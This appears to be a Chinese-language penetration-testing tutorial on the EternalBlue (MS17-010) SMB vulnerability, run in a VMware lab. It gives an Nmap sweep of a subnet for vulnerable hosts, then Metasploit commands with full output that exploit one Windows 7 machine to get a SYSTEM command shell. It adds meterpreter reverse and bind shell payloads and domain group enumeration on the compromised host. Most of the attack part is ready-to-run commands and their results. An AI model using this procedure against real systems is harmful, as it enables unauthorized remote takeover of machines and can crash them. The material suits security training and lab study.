永恆之藍(MS17-010)檢測與利用

目錄

• 利用Nmap檢測
• MSF反彈SHELL
  • 注意
  • 亂碼
• 參考

---

利用Nmap檢測

命令：

nmap -p445 --script smb-vuln-ms17-010 [IP]

# 如果運行報錯，可以加個sudo

IP/24 = 8位地址范圍，對應的子網掩碼簡單理解：

ip/24
11111111 11111111 11111111 00000000
2^8=256-2=254（台）

ip/16
11111111 11111111 00000000 00000000
2^16=65536-2=65534（台）

ip/8
11111111 00000000 00000000 00000000
2^24=16777216-2=16777214（台）

打印結果：
x.x.x.x/24 = x.x.x.1~255

root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds

從報告結果可以看出，內網中192.168.119.139這台主機存在ms-17-010漏洞；

MSF反彈SHELL

命令

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 【IP】
run

打印結果：

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

利用永恆之藍成功！但返回的只是一個cmdshell ;

因為msf默認用的paylaod是：payload/windows/x64/shell/reverse_tcp

我們可以設置成其他payload: set payload windows/x64/meterpreter/reverse_tcp
只要設置rhosts和rport就OK了;

exploit 運行，這個時候就反彈的就是一個meterpreter會話 （更強的payload）。

使用正向的payload也是可以的：set payload windows/x64/meterpreter/bind_tcp

注意

有ms17_010漏洞的主機，一般都是舊版windows系統的主機，用攻擊模塊的時候，可能會導致主機的藍屏宕機，所以需要謹慎一些。

亂碼

有亂碼都是因為編碼不一致造成的；

成因：

• Linux下面漢字默認是UTF-8編碼
• Windows下漢字使用的是GBK系列編碼

解決方案：

• Kali下先勾選GBK編碼

C:\Windows\system32>net group
net group

\\ �����ʻ�

-------------------------------------------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
����������ϣ�������һ��������

chcp 65001

C:\Windows\system32>net group
net group

Group Accounts for \\

-------------------------------------------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

參考

https://cloud.tencent.com/developer/article/1541123
https://www.sqlsec.com/2018/03/smb.html